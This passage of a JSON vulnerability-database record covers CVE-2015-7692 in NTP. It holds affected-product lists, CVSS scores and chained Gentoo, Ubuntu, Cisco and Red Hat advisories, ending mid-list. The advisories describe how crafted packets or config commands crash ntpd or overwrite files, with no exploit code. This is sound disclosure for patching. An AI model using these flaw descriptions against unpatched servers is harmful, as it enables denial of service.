"cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.77", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7692" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tenable", "sources": [ { "db": "BID", "id": "77285" } ], "trust": 0.3 }, "cve": "CVE-2015-7692", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-7692", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-7692", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-7692", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201510-588", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2015-7692", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7692" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "CNNVD", "id": "CNNVD-201510-588" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The crypto_xmit function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (crash). NOTE: This vulnerability exists due to an incomplete fix for CVE-2014-9750. NTP Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nA remote attacker may exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Due to the nature of this issue, code-injection may be possible; however this has not been confirmed. \nVersions prior to NTP 4.2.8p4 and 4.3.x prior to 4.3.77 are vulnerable. \nNote #2: This issue was previously titled \u0027NTP CVE-2015-7692 Denial of Service Vulnerability\u0027. The title has been changed to better reflect the vulnerability information. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. ============================================================================\nUbuntu Security Notice USN-2783-1\nOctober 27, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\ndirectives. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\ntypes. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain file\npaths. (CVE-2015-5196, CVE-2015-7703)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled restarting after hitting a panic threshold. \n(CVE-2015-5300)\n\nIt was discovered that NTP incorrectly handled autokey data packets. \n(CVE-2015-7701)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled rate limiting. (CVE-2015-7704,\nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\ndirectives. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\nascii conversion. (CVE-2015-7852)\n\nYves Younan discovered that NTP incorrectly handled reference clock memory. \n(CVE-2015-7853)\n\nJohn D \"Doug\" Birdwell discovered that NTP incorrectly handled decoding\ncertain bogus values. (CVE-2015-7871)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu8.1\n\nUbuntu 15.04:\n ntp 1:4.2.6.p5+dfsg-3ubuntu6.2\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.6\n\nIn general, a standard system update will make all the necessary changes. 6) - i386, noarch, x86_64\n\n3. \n\nOn October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server\u0027s advertised time. \n\nWorkarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security and bug fix update\nAdvisory ID: RHSA-2016:2583-02\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-2583.html\nIssue date: 2016-11-03\nCVE Names: CVE-2015-5194 CVE-2015-5195 CVE-2015-5196 \n CVE-2015-5219 CVE-2015-7691 CVE-2015-7692 \n CVE-2015-7701 CVE-2015-7702 CVE-2015-7703 \n CVE-2015-7852 CVE-2015-7974 CVE-2015-7977 \n CVE-2015-7978 CVE-2015-7979 CVE-2015-8158 \n=====================================================================\n\n1. Summary:\n\nAn update for ntp is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nSecurity Fix(es):\n\n* It was found that the fix for CVE-2014-9750 was incomplete: three issues\nwere found in the value length checks in NTP\u0027s ntp_crypto.c, where a packet\nwith particular autokey operations that contained malicious data was not\nalways being completely validated. (CVE-2015-7691, CVE-2015-7692,\nCVE-2015-7702)\n\n* A memory leak flaw was found in ntpd\u0027s CRYPTO_ASSOC. If ntpd was\nconfigured to use autokey authentication, an attacker could send packets to\nntpd that would, after several days of ongoing attack, cause it to run out\nof memory. (CVE-2015-7701)\n\n* An off-by-one flaw, leading to a buffer overflow, was found in\ncookedprint functionality of ntpq. (CVE-2015-7852)\n\n* A NULL pointer dereference flaw was found in the way ntpd processed\n\u0027ntpdc reslist\u0027 commands that queried restriction lists with a large amount\nof entries. (CVE-2015-7977)\n\n* A stack-based buffer overflow flaw was found in the way ntpd processed\n\u0027ntpdc reslist\u0027 commands that queried restriction lists with a large amount\nof entries. \n(CVE-2015-7978)\n\n* It was found that when NTP was configured in broadcast mode, a remote\nattacker could broadcast packets with bad authentication to all clients. \nThe clients, upon receiving the malformed packets, would break the\nassociation with the broadcast server, causing them to become out of sync\nover a longer period of time. (CVE-2015-7979)\n\n* It was found that ntpd could crash due to an uninitialized variable when\nprocessing malformed logconfig configuration commands. (CVE-2015-5194)\n\n* It was found that ntpd would exit with a segmentation fault when a\nstatistics type that was not enabled during compilation (e.g. timingstats)\nwas referenced by the statistics or filegen configuration command. \n(CVE-2015-5195)\n\n* It was found that NTP\u0027s :config command could be used to set the pidfile\nand driftfile paths without any restrictions. A remote attacker could use\nthis flaw to overwrite a file on the file system with a file containing the\npid of the ntpd process (immediately) or the current estimated drift of the\nsystem clock (in hourly intervals). (CVE-2015-5196, CVE-2015-7703)\n\n* It was discovered that the sntp utility could become unresponsive due to\nbeing caught in an infinite loop when processing a crafted NTP packet. \n(CVE-2015-5219)\n\n* A flaw was found in the way NTP verified trusted keys during symmetric\nkey authentication. An authenticated client (A) could use this flaw to\nmodify a packet sent between a server (B) and a client (C) using a key that\nis different from the one known to the client (A). (CVE-2015-7974)\n\n* A flaw was found in the way the ntpq client processed certain incoming\npackets in a loop in the getresponse() function. A remote attacker could\npotentially use this flaw to crash an ntpq client instance. (CVE-2015-8158)\n\nThe CVE-2015-5219 and CVE-2015-7703 issues were discovered by Miroslav\nLichvA!r (Red Hat). \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing this update, the ntpd daemon will restart automatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1242553 - ntpd doesn\u0027t reset system leap status when disarming leap timer\n1254542 - CVE-2015-5194 ntp: crash with crafted logconfig configuration command\n1254544 - CVE-2015-5195 ntp: ntpd crash when processing config commands with statistics type\n1254547 - CVE-2015-7703 ntp: config command can be used to set the pidfile and drift file paths\n1255118 - CVE-2015-5219 ntp: infinite loop in sntp processing crafted packet\n1274254 - CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c\n1274255 - CVE-2015-7701 ntp: slow memory leak in CRYPTO_ASSOC\n1274261 - CVE-2015-7852 ntp: ntpq atoascii memory corruption vulnerability\n1297471 - CVE-2015-7974 ntp: missing key check allows impersonation between authenticated peers (VU#357792)\n1300269 - CVE-2015-7977 ntp: restriction list NULL pointer dereference\n1300270 - CVE-2015-7978 ntp: stack exhaustion in recursive traversal of restriction list\n1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode\n1300273 - CVE-2015-8158 ntp: potential infinite loop in ntpq\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-25.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-25.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nntpdate-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-25.el7.noarch.rpm\nntp-perl-4.2.6p5-25.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nsntp-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-25.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-25.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nntpdate-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-25.el7.noarch.rpm\nntp-perl-4.2.6p5-25.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nsntp-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-25.el7.src.rpm\n\naarch64:\nntp-4.2.6p5-25.el7.aarch64.rpm\nntp-debuginfo-4.2.6p5-25.el7.aarch64.rpm\nntpdate-4.2.6p5-25.el7.aarch64.rpm\n\nppc64:\nntp-4.2.6p5-25.el7.ppc64.rpm\nntp-debuginfo-4.2.6p5-25.el7.ppc64.rpm\nntpdate-4.2.6p5-25.el7.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-25.el7.ppc64le.rpm\nntp-debuginfo-4.2.6p5-25.el7.ppc64le.rpm\nntpdate-4.2.6p5-25.el7.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-25.el7.s390x.rpm\nntp-debuginfo-4.2.6p5-25.el7.s390x.rpm\nntpdate-4.2.6p5-25.el7.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-25.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nntpdate-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nntp-debuginfo-4.2.6p5-25.el7.aarch64.rpm\nsntp-4.2.6p5-25.el7.aarch64.rpm\n\nnoarch:\nntp-doc-4.2.6p5-25.el7.noarch.rpm\nntp-perl-4.2.6p5-25.el7.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-25.el7.ppc64.rpm\nsntp-4.2.6p5-25.el7.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-25.el7.ppc64le.rpm\nsntp-4.2.6p5-25.el7.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-25.el7.s390x.rpm\nsntp-4.2.6p5-25.el7.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nsntp-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-25.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-25.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nntpdate-4.2.6p5-25.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-25.el7.noarch.rpm\nntp-perl-4.2.6p5-25.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm\nsntp-4.2.6p5-25.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 